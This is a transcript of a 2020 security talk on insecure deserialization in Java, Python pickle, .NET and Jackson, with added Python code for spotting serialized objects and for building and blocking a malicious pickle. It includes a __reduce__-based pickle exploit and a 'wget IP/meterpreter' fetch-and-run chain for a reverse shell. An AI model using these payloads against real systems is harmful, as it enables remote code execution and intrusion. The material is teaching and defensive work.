How to be an App Serial Killer
Rebecca Deck, Avalara, @ranger_cha
Posted 05-Feb-2020
DON'T BE SCARED!!! (or bored)
- If you know nothing about this topic…
  - Hopefully you understand 25%
- If you know a little about the topic…
  - 50-75%
- If you are really solid in your knowledge of the topic…
  - Learn one or two new things
Objective
-Deserialization Background
-Normal Deserialization
-Finding Deserialization Issues
-Deserialization Exploitation
Deserialization Background
September 29, 2019
Serialization from the beginning…
What is an object? A collection of values (fields) that works as a single unit.
Serialization is the process of turning such an object into a stream of bytes (or text) so it can be stored or sent over the network. Also called marshalling.
What does serialization look like?
Source: https://www.javaworld.com/article/2072752/the-java-serialization-algorithm-revealed.html
Deserialization
Deserialization is the reverse of serialization: rebuild the object from the stream.
In Java it usually happens in an ObjectInputStream.readObject call; the same pattern is common in many languages.
The attack: force the server to load an unexpected object, a class it has available but never meant to receive here.
Often the result is arbitrary code execution on the server.
Transferring Data with Serialization
Three places serialized objects travel, and therefore three places an attacker can feed one in:
- Server serializes -> Client deserializes (responses)
- Client serializes -> Server deserializes (requests: the usual entry point)
- Server serializes -> writes data to disk/memcache -> Server deserializes later (sessions, caches)
Malicious Objects
Source: https://adamcaudill.com/2017/10/04/exploiting-jackson-rce-cve-2017-7525/
Deserialization Remediation
How do you fix it? Upgrade for…
Blacklisting??? Nooooo
Hard to write signatures: a blacklist only covers the gadget classes people already know about, and new chains keep turning up.
Deserialization Remediation
Look-ahead deserialization: override ObjectInputStream.resolveClass
Ensure that the object is of the correct (expected) class before it is instantiated
JUST DON'T DO IT
Do something better, like a default JSON parser that only produces plain data and carries no type information in the stream
Finding Deserialization
White Box
Talk to developers
Look for deserialization calls:
Java – ObjectInputStream.readObject
Python – pickle.load / pickle.loads
.NET – TypeNameHandling (Json.NET), JavaScriptTypeResolver (JavaScriptSerializer)
Jackson – enableDefaultTyping, setSerializationInclusion, readValue
Black Box
Look for serialized objects in traffic, cookies, hidden fields and cache entries:
Java – rO0 (base64), ACED0005 (hex), Content-Type: application/x-java-serialized-object
.NET – AAEAAAD///// (base64 BinaryFormatter header), TypeObject, $type:
Python –
JSON – ["objtype",{"name": "value"}] (a type name carried next to the data)
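The signature list above is what you grep for in proxy logs and cookies. The helper below turns it into a small fingerprinting function. This is an added example written for this transcript, not code from the talk: the pickle check (PROTO opcode 0x80 followed by the protocol number, STOP "." at the end) and the Jackson "@class" property are my additions to the slide's list, and the samples at the bottom are constructed, not captured traffic.

```python
"""Fingerprint request/response bodies that look like serialized objects."""
import base64
import binascii
import json
import pickle
import re
from typing import Dict, Optional, Union

# Magic values from the slides. The Java stream header AC ED 00 05 base64-encodes
# to "rO0AB...", and the .NET BinaryFormatter header base64-encodes to "AAEAAAD/////".
JAVA_MAGIC = b"\xac\xed\x00\x05"
DOTNET_MAGIC = base64.b64decode("AAEAAAD/////")
# Added here: a pickle written with protocol 2 or later begins with the PROTO
# opcode 0x80 followed by the protocol number, and every pickle ends with STOP ".".
PICKLE_PROTO = 0x80

_B64_RE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")
_DOTTED_CLASS_RE = re.compile(r"^[A-Za-z_$][\w$]*(\.[A-Za-z_$][\w$]*)+$")


def _maybe_base64(text: str) -> Optional[bytes]:
    """Decode text as base64 when it plausibly is base64; otherwise return None."""
    compact = "".join(text.split())
    if len(compact) < 8 or not _B64_RE.match(compact):
        return None
    try:
        return base64.b64decode(compact + "=" * (-len(compact) % 4), validate=True)
    except (binascii.Error, ValueError):
        return None


def _classify_bytes(blob: bytes) -> Optional[str]:
    """Match raw bytes against the known stream headers."""
    if blob.startswith(JAVA_MAGIC):
        return "java-serialized-object"
    if blob.startswith(DOTNET_MAGIC):
        return "dotnet-binaryformatter"
    if len(blob) >= 2 and blob[0] == PICKLE_PROTO and 2 <= blob[1] <= 5 and blob.endswith(b"."):
        return "python-pickle"
    return None


def _classify_json(text: str) -> Optional[str]:
    """Spot JSON that carries a type name next to the data."""
    try:
        doc = json.loads(text)
    except ValueError:
        return None
    # Jackson default typing: ["fully.qualified.ClassName", {fields...}], the slide's ["objtype",{...}].
    if (isinstance(doc, list) and len(doc) == 2 and isinstance(doc[0], str)
            and _DOTTED_CLASS_RE.match(doc[0]) and isinstance(doc[1], dict)):
        return "json-jackson-default-typing"
    if isinstance(doc, dict):
        if "$type" in doc:      # Json.NET TypeNameHandling
            return "json-dotnet-typenamehandling"
        if "@class" in doc:     # Jackson @JsonTypeInfo(use = Id.CLASS); added here, not on the slide
            return "json-jackson-class-property"
    return None


def identify_serialized(body: Union[bytes, str], content_type: str = "") -> Optional[str]:
    """Return a label for the serialization format the body appears to carry, or None."""
    if "application/x-java-serialized-object" in content_type.lower():
        return "java-serialized-object"
    if isinstance(body, bytes):
        label = _classify_bytes(body)
        if label:
            return label
        try:
            body = body.decode("ascii")      # maybe base64 or JSON text sent as bytes
        except UnicodeDecodeError:
            return None
    label = _classify_json(body)
    if label:
        return label
    decoded = _maybe_base64(body)
    return _classify_bytes(decoded) if decoded is not None else None


def classify_samples() -> Dict[str, Optional[str]]:
    """Constructed samples (not captured traffic) run through identify_serialized."""
    java_stream = JAVA_MAGIC + b"sr\x00\x11java.util.HashMap"
    samples = {
        "raw java stream": java_stream,
        "base64 java cookie": base64.b64encode(java_stream).decode(),
        "base64 .NET blob": "AAEAAAD/////AQAAAAAAAAAMAgAAAA==",
        "pickle protocol 4": pickle.dumps({"user": "alice"}, protocol=4),
        "jackson default typing": '["com.example.User",{"name":"alice"}]',
        "json.net $type": '{"$type":"MyApp.Models.Order, MyApp","id":7}',
        "plain json": '{"name":"alice"}',
    }
    return {name: identify_serialized(sample) for name, sample in samples.items()}


if __name__ == "__main__":
    for name, label in classify_samples().items():
        print(f"{name:24} -> {label}")
```

Run it over response bodies, Set-Cookie values and hidden form fields; anything that comes back with a label is a candidate for the exploitation steps in the next section. A hit is only a candidate: the type-tagged JSON cases still need the server to actually honour the type name.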
Exploiting Deserialization
Pickle Deserialization
https://blog.nelhage.com/2011/03/exploiting-pickle/
Look for pickle.load / pickle.loads calls on data the client controls
Pickle Deserialization Exploit Class
Create a class that executes code when created: give it a __reduce__ method that returns a callable (os.system, subprocess) and the arguments for it. Unpickling calls that callable; the receiving side never needs your class.
Pickle Send Exploit
Send the pickled payload to the server wherever it accepts a pickle (cookie, POST body, cache entry)
How depends on the app
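The two pickle slides above (build a class that runs code when loaded, then send it) and the look-ahead remediation slide earlier (check the class before the object is built) fit in one short script. This is an added example for this transcript, not the speaker's code or the nelhage post's: the command is a harmless stand-in for the wget/chmod/run chain, ALLOWED_GLOBALS is a made-up allow-list, and Unpickler.find_class is the pickle hook that plays the part resolveClass plays in Java.

```python
"""Malicious pickle vs. an allow-list Unpickler."""
import io
import pickle
import subprocess
import sys


class Exploit:
    """Instance whose reduction tells the unpickler to call a function of our choice.

    pickle stores the result of __reduce__ as (callable, args) and calls it on load.
    The loading side never sees the name Exploit; the stream only references
    subprocess.check_output and the argument list. The command is a harmless
    stand-in for wget/chmod/meterpreter.
    """

    def __reduce__(self):
        return (subprocess.check_output, ([sys.executable, "-c", "print('code ran')"],))


def build_payload() -> bytes:
    """What the attacker sends (cookie, POST body, cache entry: depends on the app)."""
    return pickle.dumps(Exploit())


def legit_payload() -> bytes:
    """What the application actually exchanges: plain data."""
    return pickle.dumps({"user": "alice", "roles": ["reader"]})


def unsafe_load(blob: bytes):
    """The vulnerable server: pickle.loads on attacker-controlled bytes."""
    return pickle.loads(blob)


# Look-ahead deserialization, pickle edition: every global the stream names is
# resolved through an allow-list before anything is built. Hypothetical allow-list.
ALLOWED_GLOBALS = {("builtins", "set"), ("builtins", "frozenset"), ("collections", "OrderedDict")}


class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module: str, name: str):
        if (module, name) in ALLOWED_GLOBALS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"forbidden global {module}.{name}")


def safe_load(blob: bytes):
    """Plain data (dicts, lists, strings) needs no globals and loads fine."""
    return RestrictedUnpickler(io.BytesIO(blob)).load()


def is_rejected(blob: bytes) -> bool:
    """True when the allow-list stops the stream before any code runs."""
    try:
        safe_load(blob)
    except pickle.UnpicklingError:
        return True
    return False


if __name__ == "__main__":
    payload = build_payload()
    print("vulnerable server returned:", unsafe_load(payload))   # the command's stdout
    print("legit data through safe_load:", safe_load(legit_payload()))
    print("exploit rejected by safe_load:", is_rejected(payload))
```

unsafe_load returns whatever the attacker's callable returned, which is why the classic payloads use os.system or subprocess: the "object" the server asked for is just the side effect of running them. The allow-list fixes that for pickle, but the slide's advice still stands: a format that carries no type information at all is the cleaner fix.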
Deserialization in Java
Look for raw Java objects
Find a suitable gadget (an object that runs code when loaded). It must be a class the app has on its classpath.
ysoserial provides several gadget chains: https://github.com/frohoff/ysoserial
Deserialization in Java
Vulnerable app: https://github.com/hvqzao/java-deserialize-webapp
Includes Apache Commons Collections, so the CommonsCollections gadget chains apply
A ysoserial payload only runs one command (Runtime.exec with no shell, so no pipes or redirects)
Reverse shell in three commands, one payload each:
wget IP/meterpreter
chmod +x meterpreter
./meterpreter
Deserialization in Java Example (four screenshot slides; images not included in the transcript)
No Java Objects?
Are you safe without Java objects? No.
Moar gadgets: https://github.com/mbechler/marshalsec
Same idea, different format: JSON and XML marshallers that carry type information can be driven to instantiate gadget classes too
Jackson Deserialization (four screenshot slides; images not included in the transcript)
Summary
• ysoserial and marshalsec for exploit gadgets
• Find by looking for common serialized-object magic numbers in traffic, or for deserialization routines in code
• Vendors often "fix" deserialization by blacklisting gadget classes, so you need the patch, and the next gadget chain walks around the blacklist
• Better off rewriting the data serialization method
• Use safer (less full-featured) libraries
References
Look-ahead Java Deserialization
https://www.ibm.com/developerworks/java/library/se-lookahead/index.html
Deserialization Resources
https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet/blob/master/README.md
Marshalling Pickles
http://frohoff.github.io/appseccali-marshalling-pickles/
ysoserial
https://github.com/frohoff/ysoserial
Deserialization – Different marshallers
https://github.com/mbechler/marshalsec
Pickle Deserialization
https://blog.nelhage.com/2011/03/exploiting-pickle/
Java Deserialization app
https://github.com/hvqzao/java-deserialize-webapp
Jackson Deserialization
https://adamcaudill.com/2017/10/04/exploiting-jackson-rce-cve-2017-7525/
Questions?
www.directdefense.com